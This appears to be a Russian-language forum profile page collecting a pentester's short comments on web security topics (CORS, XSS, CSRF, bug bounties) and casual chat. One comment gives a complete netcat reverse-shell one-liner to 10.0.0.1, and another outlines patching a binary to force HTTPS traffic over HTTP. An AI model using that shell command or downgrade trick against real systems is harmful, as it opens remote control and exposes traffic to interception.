Pull to refresh
143
0
Олег Марконенко @fil9

Пентестер

Send message
И еще стоить отметить, что значение заголовка «Access-Control-Allow-Origin» не должно равняться *. Иначе, даже если Access-Control-Allow-Credentials === true, то браузер не допустит отправку сredentials.
И без флага -e работает :)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Если серверная сторона не видит разницы между HTTPS и HTTP соединениями, берем отладчик, реверсим исполняемый файл, и меняем https на http, ну и порт, если отличен от 80.
Проверено десятком разного рода софта.
В русской версии сакурити, еще остался мой twitter'овский ник.
Эх. Удалился я :(
Кстати, надо что-нибудь запилить.
Я тебе отпишусь на днях в скайпе
Интересно, что будет рекомендовать мне ФБ, прочитав овер 9000 входящих СМС только от оператора?
Новый GOOD'OK? :)
К сожалению — Москва
Ты все еще там?
Привет)
Вот тут с вами согласен, за скорость действительно, уважаю их.
UPD: Или вы про ФБ?
Ну про остальных не знаю, но вот у ВК с безопасностью проблемы.
Да, защита от XSS есть, CSRF-токены там всякие.
На самом деле, не все так радужно. Много сказано на эту тему, но пока они не будут поощрять за уязвимости, ничего хорошего не выйдет.
Может это только мое мнение, тут не мне судить, так сказать.
Но факт остается в том, что я находил довольно много разных нехороших штук, там, у них под капотом.
Чего стоит только моя XSS в Августе 2012 Хабр (если мне сейчас 17, то сколько было тогда?).
НО(!), у них такая политика. С этим ничего не поделаешь. Мы живем в таком мире, где просто не существует идеальной защиты.
Но почему не предпринимать попытки для ее создания (читай Баг баунти), я не понимаю.

П.с: Кстати, FB меня кинул, с CSRF ;)
А сколько лет вам тогда было? :)
Кстати, а как у Nvidia Optimus обстоят дела с Убунту?
Как ни странно, но зачастую мы используем Окна только из за софта, которого просто нет на *nix.
В моем же случае, все упирается в реверсивный инжиниринг оконных программ.
Дети то в курсе, да, но вот в нужном ли направлении их защищает государство, или просто прикрывается ими, это другой вопрос.
Самое страшное — детям жить в этом маразме. Знали бы они, как их «опекает» государство.
Дак ведь это не единичный случай то! Сколько уже можно!?
Возможно это афроамериканка-хакерша, тогда бы это все объяснило.
Блокировка очков :)

Information

Rating
Does not participate
Location
Санкт-Петербург, Санкт-Петербург и область, Россия
Date of birth
Registered
Activity